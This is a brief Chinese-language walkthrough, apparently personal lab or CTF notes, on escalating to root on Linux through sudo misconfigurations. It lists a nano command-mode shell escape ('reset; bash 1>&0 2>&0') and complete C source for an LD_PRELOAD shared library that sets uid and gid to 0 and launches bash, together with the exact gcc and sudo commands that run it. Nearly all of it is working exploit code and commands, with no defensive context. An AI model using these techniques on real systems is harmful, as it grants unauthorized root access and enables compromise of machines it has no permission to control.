1.sudo -l 查看与root权限相关的信息
上图说明,有三个程序不需要密码就能按照sudo运行的程序,分别是find、less、nano
2.sudo nano进入nano编辑器,ctrl+r然后ctrl+x,进入运行命令模式:
输入“reset; bash 1>&0 2>&0”回车,发现提权了
如果sudo -l发现环境有LD_PRELOAD,(LD_PRELOAD 是一个允许任何程序使用共享库的函数),可以尝试利用以下思路:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
将上述代码保存成shell.c文件,运行命令 “gcc -fPIC -shared -o shell.so shell.c -nostartfiles” 编译后,生成shell.so;
使用命令“sudo LD_PRELOAD=/home/user/ldpreload/shell.so find”可以提权